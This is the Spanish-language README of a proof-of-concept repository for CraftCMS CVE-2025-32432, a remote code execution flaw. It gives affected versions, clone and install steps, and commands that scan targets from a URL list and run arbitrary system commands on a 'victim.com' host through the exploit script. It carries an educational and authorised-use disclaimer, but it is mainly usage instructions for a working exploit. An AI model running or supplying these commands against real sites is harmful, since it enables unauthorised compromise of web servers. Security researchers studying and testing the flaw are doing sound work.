
CraftCMS CVE-2025-32432 - PoC limpio
Versión limpia y mejorada del Proof of Concept original.
Este proyecto está bajo licencia MIT. Ver el archivo LICENSE para más detalles.
Este PoC se proporciona únicamente con fines educativos y pruebas autorizadas (CTF, auditorías de seguridad con permiso escrito explícito).
Cualquier uso en sistemas sin autorización es ilegal. El autor declina toda responsabilidad por mal uso.
< 3.9.15< 4.14.15< 5.6.17craftcms-cve-2025-32432-poc/
├── craftcms_rce_php_check.py
├── craftcms_final_payload.py
├── requirements.txt
├── README.md
├── LICENSE
└── .gitignore
git clone https://github.com/n40y/craftcms-cve-2025-32432-poc.git
cd craftcms-cve-2025-32432-poc
pip3 install -r requirements.txt
python3 craftcms_rce_php_check.py -u https://target.com
# O con una lista
python3 craftcms_rce_php_check.py -f urls.txt -t 10
python3 craftcms_final_payload.py -u https://victim.com -c "id"
-u, --url → URL objetivo (obligatorio)
-c, --cmd → Comando del sistema a ejecutar (obligatorio)
-a, --asset → AssetId válido conocido (opcional)
-s, --scan-max → Máximo assetId a escanear (por defecto: 300)